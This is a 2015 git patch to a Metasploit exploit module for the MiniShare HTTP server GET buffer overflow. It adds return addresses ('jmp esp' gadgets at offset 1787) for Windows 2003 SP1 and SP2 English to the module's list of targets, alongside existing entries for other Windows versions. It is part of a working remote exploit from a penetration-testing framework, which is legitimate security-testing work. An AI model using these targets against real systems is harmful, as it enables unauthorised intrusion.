From 505ecd32fb283fe353d91fde975bfba3093d3249 Mon Sep 17 00:00:00 2001 From: Adam Ziaja Date: Fri, 20 Mar 2015 23:09:50 +0100 Subject: [PATCH] Update minishare_get_overflow.rb Windows 2003 SP1 English, Windows 2003 SP2 English --- modules/exploits/windows/http/minishare_get_overflow.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index febc4d7972..de061ddbed 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -46,6 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret ['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret ['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret + ['Windows 2003 SP1 English', { 'Rets' => [ 1787, 0x77403680 ]}], # jmp esp + ['Windows 2003 SP2 English', { 'Rets' => [ 1787, 0x77402680 ]}], # jmp esp ['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp ['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp ['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp